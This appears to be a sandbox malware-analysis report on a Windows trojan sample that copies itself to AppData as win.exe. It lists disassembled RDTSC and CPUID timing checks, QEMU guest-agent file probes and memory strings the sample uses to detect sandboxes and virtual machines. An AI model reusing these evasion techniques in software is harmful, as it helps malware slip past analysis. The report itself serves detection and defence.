Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B47AA second address: 00000000020B7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C37BB16h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C37BB12h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C37EF0Eh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B5549 second address: 00000000020B5549 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B53C5 second address: 00000000020B53C5 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B57E9 second address: 00000000020B57E9 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000005632A1 second address: 00000000005632A1 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 0000000000563399 second address: 0000000000563399 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B9ACC second address: 00000000020B9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C8016E2h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A9ACC second address: 00000000007A9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C8016E2h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A900A second address: 00000000007A9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C37BB16h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C8016E6h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A9059 second address: 00000000007A9059 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B9059 second address: 00000000020B9059 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A9138 second address: 00000000007A9138 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B9138 second address: 00000000020B9138 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A5970 second address: 00000000007A5970 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B5970 second address: 00000000020B5970 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A7FD6 second address: 00000000007A7FD6 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B7FD6 second address: 00000000020B7FD6 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A47AA second address: 00000000007A7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C37BB16h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C37BB12h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C37EF0Eh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B47AA second address: 00000000020B7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C8016E6h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C8016E2h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C804ADEh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A5549 second address: 00000000007A5549 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B5549 second address: 00000000020B5549 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A53C5 second address: 00000000007A53C5 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000007A57E9 second address: 00000000007A57E9 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B53C5 second address: 00000000020B53C5 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B57E9 second address: 00000000020B57E9 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C37BB16h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000005632A1 second address: 00000000005632A1 instructions:
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 0000000000563399 second address: 0000000000563399 instructions:

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\win.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: win.exe, 00000016.00000002.670753706.0000000002270000.00000004.00000001.sdmp, win.exe, 00000017.00000002.846427642.00000000006B0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384206851.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000010.00000002.614919374.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000011.00000002.611067572.00000000021D0000.00000004.00000001.sdmp, win.exe, 00000012.00000002.645395276.00000000020C0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, 00000000.00000002.384206851.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000010.00000002.614919374.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000011.00000002.611067572.00000000021D0000.00000004.00000001.sdmp, win.exe, 00000012.00000002.645395276.00000000020C0000.00000004.00000001.sdmp, win.exe, 00000016.00000002.670753706.0000000002270000.00000004.00000001.sdmp, win.exe, 00000017.00000002.846427642.00000000006B0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B8640 second address: 00000000020B8717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C37BB12h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C37C008h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C37BB12h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C37BB12h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B9ACC second address: 00000000020B9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C37BB12h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C8016E6h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B9059 second address: 00000000020B9059 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B9138 second address: 00000000020B9138 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B5970 second address: 00000000020B5970 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B7FD6 second address: 00000000020B7FD6 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B47AA second address: 00000000020B7C84 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a push edi 0x0000000b mov edi, dword ptr [ebp+000001F8h] 0x00000011 test ebx, ecx 0x00000013 push 65F1F4E5h 0x00000018 xor dword ptr [esp], 68B63E62h 0x0000001f cmp cx, 6718h 0x00000024 xor dword ptr [esp], 63E23595h 0x0000002b test bx, bx 0x0000002e test ch, ch 0x00000030 add dword ptr [esp], 915A00F2h 0x00000037 mov dword ptr [ebp+000001C3h], ecx 0x0000003d mov ecx, 14B06061h 0x00000042 xor ecx, 8D1AA2EFh 0x00000048 jmp 00007F430C37BB16h 0x0000004a test dh, dh 0x0000004c xor ecx, EA202822h 0x00000052 add ecx, 8C751554h 0x00000058 cmp ebx, edx 0x0000005a push ecx 0x0000005b cmp dh, ch 0x0000005d mov ecx, dword ptr [ebp+000001C3h] 0x00000063 sub edi, 00000400h 0x00000069 mov dword ptr [ebp+00000205h], esi 0x0000006f mov esi, edi 0x00000071 cmp edx, edx 0x00000073 push esi 0x00000074 mov esi, dword ptr [ebp+00000205h] 0x0000007a test bl, bl 0x0000007c mov dword ptr [ebp+00000256h], eax 0x00000082 cmp dh, ah 0x00000084 mov eax, edi 0x00000086 push eax 0x00000087 jmp 00007F430C37BB12h 0x00000089 cmp bh, ch 0x0000008b mov eax, dword ptr [ebp+00000256h] 0x00000091 push dword ptr [ebp+4Ch] 0x00000094 call 00007F430C37EF0Eh 0x00000099 cmp cx, 5DDDh 0x0000009e mov eax, dword ptr fs:[00000030h] 0x000000a4 mov eax, dword ptr [eax+10h] 0x000000a7 pushad 0x000000a8 mov eax, 000000AFh 0x000000ad rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B5549 second address: 00000000020B5549 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B4EE7 second address: 00000000020B4F57 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, E6694764h 0x00000010 xor eax, 84AE2B33h 0x00000015 xor eax, 41623A29h 0x0000001a sub eax, 23A5567Eh 0x0000001f push eax 0x00000020 mov eax, dword ptr [ebp+000001E4h] 0x00000026 push 9EE3AA3Fh 0x0000002b jmp 00007F430C37BB12h 0x0000002d test dx, dx 0x00000030 xor dword ptr [esp], F222664Ah 0x00000037 test dx, cx 0x0000003a xor dword ptr [esp], 30D813E0h 0x00000041 cmp bl, cl 0x00000043 xor dword ptr [esp], 5C19DF97h 0x0000004a test ecx, ecx 0x0000004c mov eax, ebp 0x0000004e cmp dx, dx 0x00000051 add eax, 00000100h 0x00000056 mov dword ptr [eax], C54B295Eh 0x0000005c pushad 0x0000005d lfence 0x00000060 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B53C5 second address: 00000000020B53C5 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000020B57E9 second address: 00000000020B57E9 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 0000000000568640 second address: 0000000000568717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C8016E2h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C801BD8h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C8016E2h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C8016E2h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 00000000005632A1 second address: 00000000005632A1 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 0000000000563399 second address: 0000000000563399 instructions:
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 000000000056379A second address: 000000000056383C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov eax, dword ptr fs:[00000030h] 0x00000009 cmp bl, al 0x0000000b mov eax, dword ptr [eax+0Ch] 0x0000000e mov eax, dword ptr [eax+0Ch] 0x00000011 test cl, cl 0x00000013 test bl, cl 0x00000015 test edx, 7C659410h 0x0000001b mov ecx, dword ptr [edi+00000808h] 0x00000021 jmp 00007F430C37BB40h 0x00000023 mov dword ptr [eax+20h], ecx 0x00000026 mov esi, dword ptr [edi+00000800h] 0x0000002c mov dword ptr [eax+18h], esi 0x0000002f add esi, dword ptr [edi+00000850h] 0x00000035 mov dword ptr [eax+1Ch], esi 0x00000038 cmp dword ptr [ebp+70h], 01h 0x0000003c je 00007F430C37BE0Ch 0x00000042 jmp 00007F430C37BB16h 0x00000044 cmp edi, A946FD75h 0x0000004a pushad 0x0000004b mov edi, 000000E1h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe	RDTSC instruction interceptor: First address: 0000000000563B90 second address: 0000000000563B90 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b xor byte ptr [esi+ecx], 00000011h 0x0000000f add byte ptr [esi+ecx], FFFFFF86h 0x00000013 sub byte ptr [esi+ecx], FFFFFFF1h 0x00000017 cmp ecx, 00000000h 0x0000001a jne 00007F430C8016AAh 0x0000001c test dx, ax 0x0000001f dec ecx 0x00000020 mov byte ptr [esi+ecx], 0000007Ah 0x00000024 pushad 0x00000025 lfence 0x00000028 rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B8640 second address: 00000000020B8717 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b test edi, 4699953Bh 0x00000011 jmp 00007F430C37BB12h 0x00000013 cmp dx, ax 0x00000016 cmp esi, 7FFFF000h 0x0000001c je 00007F430C37C008h 0x00000022 cmp cx, bx 0x00000025 mov dword ptr [ebp+000001BBh], esi 0x0000002b mov esi, DC46126Fh 0x00000030 test ah, bh 0x00000032 add esi, 42B410DBh 0x00000038 add esi, 2F6A0FE3h 0x0000003e xor esi, 4E64332Dh 0x00000044 push esi 0x00000045 mov esi, dword ptr [ebp+000001BBh] 0x0000004b push 3F3725E0h 0x00000050 jmp 00007F430C37BB12h 0x00000052 test bl, 00000059h 0x00000055 add dword ptr [esp], E785ED73h 0x0000005c sub dword ptr [esp], F0F07B61h 0x00000063 xor dword ptr [esp], 35CC97EEh 0x0000006a mov dword ptr [ebp+000001E4h], ebx 0x00000070 cmp ah, FFFFFFC7h 0x00000073 mov ebx, edi 0x00000075 push ebx 0x00000076 mov ebx, dword ptr [ebp+000001E4h] 0x0000007c test ah, ch 0x0000007e cmp cl, dl 0x00000080 push 0C0B5FD6h 0x00000085 jmp 00007F430C37BB12h 0x00000087 test bx, 110Dh 0x0000008c xor dword ptr [esp], B8A1423Dh 0x00000093 cmp bl, cl 0x00000095 xor dword ptr [esp], 7E9EE3EAh 0x0000009c add dword ptr [esp], 35CB01FFh 0x000000a3 pushad 0x000000a4 lfence 0x000000a7 rdtsc
Source: C:\Users\user\AppData\Roaming\win.exe	RDTSC instruction interceptor: First address: 00000000020B9ACC second address: 00000000020B9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C8016E2h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
